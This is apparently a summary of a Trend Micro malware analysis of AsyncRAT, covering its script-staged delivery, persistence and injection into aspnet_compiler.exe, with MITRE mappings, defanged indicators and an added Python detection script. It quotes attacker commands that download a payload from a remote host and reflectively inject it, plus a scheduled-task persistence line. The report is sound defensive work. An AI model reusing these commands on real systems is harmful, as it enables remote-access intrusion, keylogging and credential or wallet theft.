Analyzing AsyncRAT’s Code Injection into Aspnet_Compiler.exe Across Multiple Incident Response Cases

Trend Micro MxDR investigated multiple AsyncRAT cases where attackers delivered a password‑protected ZIP containing a .wsf file that staged PowerShell/VBS/BAT scripts to download and extract a payload, then perform reflective process injection into the legitimate aspnet_compiler.exe. The chain established persistence via scheduled tasks and used dynamic DNS and socket-based C2 (e.g., 66escobar181[.]ddns[.]net) while enabling features such as keylogging. #AsyncRAT #aspnet_compiler.exe

Keypoints

  • User opens a password-protected ZIP (downloadedFile_SSAfnmeddOFzc.zip) containing downloadedFile_SSAfnmedd.wsf, which spawns wscript.exe and executes embedded PowerShell/VBScript/Batch commands.
  • The .wsf uses Start-BitsTransfer to retrieve snakers.zip from hxxp://185[.]81[.]157[.]246:222, which contains the multi-stage scripts and encoded payloads.
  • Scripting chain (Webcentral.vbs -> Webcentral.bat -> Webcentral.ps1 -> hash.vbs/hash.bat -> hash.ps1) creates scheduled tasks (Reklam/Rekill) to maintain persistence and run every two minutes.
  • hash.ps1 decodes runpe.txt and msg.txt, loads a .NET assembly (NewPE2.PE) and uses its Execute method to inject the decoded AsyncRAT payload into aspnet_compiler.exe via reflective loading.
  • The injected aspnet_compiler.exe establishes C2 via dynamic DNS domains (e.g., 66escobar181[.]ddns[.]net, httpswin10[.]kozow[.]com) and can enable capabilities like keylogging and system/crypto-wallet reconnaissance.
  • AMSI telemetry and Vision One alerts were used to pivot from network connections (45[.]141[.]215[.]40, 208[.]95[.]112[.]1) back to the initial downloaded archive and script execution chain.

MITRE Techniques

  • [T1055] Process Injection – Injected AsyncRAT into aspnet_compiler.exe using reflective loading invoked by a dynamically loaded .NET assembly (“[System.Reflection.Assembly]::Load($decoded_runpe_payload)…Invoke($null, [object[]](‘C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe’, $decoded_msg_payload))”)
  • [T1086] PowerShell – Attackers used PowerShell to download, decode, and execute payload components and to run commands with bypassed execution policy (“powershell -command … Start-BitsTransfer -Source ‘hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg’”)
  • [T1053.005] Scheduled Task – Persistence was achieved by creating Windows Task Scheduler entries named “Reklam” / “Rekill” to run scripts every two minutes (“creates a scheduled task that executes C:\Users\Public\hash.vbs … every two minutes”)
  • [T1105] Ingress Tool Transfer – Files were fetched from remote hosts using Start-BitsTransfer to save mc.jpg/snakers.zip to disk (“Start-BitsTransfer -Source ‘hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg’ -Destination ‘C:\Users\Public\snakers.zip’”)
  • [T1204.002] User Execution: Malicious File – The initial .wsf was executed by the user (wscript launched via Explorer), indicating user interaction (“wscript.exe being initiated via Windows Explorer, suggesting that the user executed the file by double-clicking it.”)
  • [T1056.001] Input Capture: Keylogging – The AsyncRAT sample enabled a keylogging routine that captures keystrokes and logs them to %TEMP%\Log.tmp (“the keylogging routine was enabled, which captures and records every keystroke of the infected machine”)

Indicators of Compromise

  • [IP address] Network and C2 context – 45[.]141[.]215[.]40 (dynamic DNS C2), 185[.]81[.]157[.]246 (download host), and other IPs such as 208[.]95[.]112[.]1
  • [Domain] C2 / infrastructure – 66escobar181[.]ddns[.]net, httpswin10[.]kozow[.]com (dynamic DNS used for C2 and obfuscation)
  • [File name] Initial and staged artifacts – downloadedFile_SSAfnmeddOFzc.zip, downloadedFile_SSAfnmedd.wsf, snakers.zip, msg.txt, runpe.txt (payload and injector files)
  • [SHA1 hash] Malware components – C:\Users\Public\Webcentral.vbs (50b6aaed93609360f33de4b40b764d3bb0bd45d1), C:\Users\Public\runpe.txt (c07b2c25f926550d804087ac663991cf06bac519), and 6 more hashes listed in the source

Read below for a concise technical rewrite of the procedure focused on actions, artifacts, and execution flow.

In these incidents attackers delivered a password‑protected ZIP that contained a Windows Script File (.wsf). When the user double‑clicked the .wsf, wscript.exe spawned and executed embedded VBScript and PowerShell commands that created C:\Users\Public\VLCdllFrame.xml, used Start-BitsTransfer to fetch mc.jpg (saved as snakers.zip) from hxxp://185[.]81[.]157[.]246:222, and expanded the archive to drop multiple scripts and two encoded PE blobs (msg.txt, runpe.txt).

The dropped components implement a staged loader: Webcentral.vbs/.bat chain launches Webcentral.ps1, which registers scheduled tasks named Reklam/Rekill to run every two minutes. Those tasks execute hash.vbs/hash.bat which call hash.ps1; hash.ps1 decodes runpe.txt and msg.txt, dynamically loads a .NET assembly (NewPE2.PE) from the decoded runpe payload, and invokes its Execute method to spawn aspnet_compiler.exe and inject the decoded AsyncRAT payload into that process (reflective loading), enabling stealthy execution under a legitimate binary.

Post‑injection activity includes socket‑based C2 using dynamic DNS domains (e.g., 66escobar181[.]ddns[.]net on port 6666 and httpswin10[.]kozow[.]com), runtime‑decrypted configuration that can enable keylogging and system/crypto‑wallet reconnaissance, and persistence via scheduled tasks. Detection pivots were made using AMSI telemetry (TELEMETRY_AMSI_EXECUTE) and Vision One alerts correlating aspnet_compiler.exe network connections (45[.]141[.]215[.]40, 208[.]95[.]112[.]1) back to the original downloaded archive and script chain.
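As an added illustration of the detection pivots described above (this is not code from the Trend Micro write-up), the Python below runs a few stage-specific rules over constructed process-creation and network telemetry: the event shape, the placeholder IP and dynamic-DNS host, and the rule names are assumptions made here.

```python
import re

# Constructed sample telemetry (not taken from the report), modelled on the chain
# described above; the host, IP and user path are stand-ins for the page's indicators.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\Downloads\downloadedFile_SSAfnmedd.wsf"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell -command Start-BitsTransfer -Source 'http://203.0.113.10:222/dd/mc.jpg' "
                r"-Destination 'C:\Users\Public\snakers.zip'"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'schtasks /create /sc minute /mo 2 /tn Reklam /tr "wscript C:\Users\Public\hash.vbs"'},
    {"type": "network", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "dest_host": "placeholder-host.ddns.net", "dest_port": 6666},
]

DYNDNS_SUFFIXES = (".ddns.net", ".kozow.com")
RAW_IP_URL = re.compile(r"https?://(\d{1,3}\.){3}\d{1,3}(:\d+)?/")
BITS_ARGS = re.compile(r"-Source\s+'([^']+)'.*?-Destination\s+'([^']+)'", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return the names of the rules each event triggers, in input order."""
    hits = []
    for ev in events:
        img, cmd = basename(ev["image"]), ev.get("cmdline", "")
        if ev["type"] == "process":
            # Script host started by the shell with a .wsf argument: a user double-click.
            if img == "wscript.exe" and basename(ev.get("parent", "")) == "explorer.exe" and ".wsf" in cmd.lower():
                hits.append("wsf_launched_from_explorer")
            # BITS download from a bare IP:port URL, saved under a different extension (mc.jpg -> .zip).
            if "start-bitstransfer" in cmd.lower() and RAW_IP_URL.search(cmd):
                hits.append("bits_download_from_raw_ip")
                m = BITS_ARGS.search(cmd)
                if m and m.group(1).rsplit(".", 1)[-1].lower() != m.group(2).rsplit(".", 1)[-1].lower():
                    hits.append("bits_extension_mismatch")
            # Minute-level scheduled task running a script out of C:\Users\Public.
            if img == "schtasks.exe" and re.search(r"/sc\s+minute\s+/mo\s+[1-5]\b", cmd, re.I) \
                    and "\\users\\public\\" in cmd.lower():
                hits.append("short_interval_task_public_dir")
        elif ev["type"] == "network" and img == "aspnet_compiler.exe":
            # A build tool has no business on the network; dynamic DNS or port 6666 raises severity.
            c2 = ev["dest_host"].lower().endswith(DYNDNS_SUFFIXES) or ev["dest_port"] == 6666
            hits.append("aspnet_compiler_outbound_dyndns_c2" if c2 else "aspnet_compiler_outbound")
    return hits
```

Each rule is deliberately narrow; in production the aspnet_compiler.exe network rule alone is the high-confidence signal, and the others add context for the pivot back to the archive.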

Read more: https://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html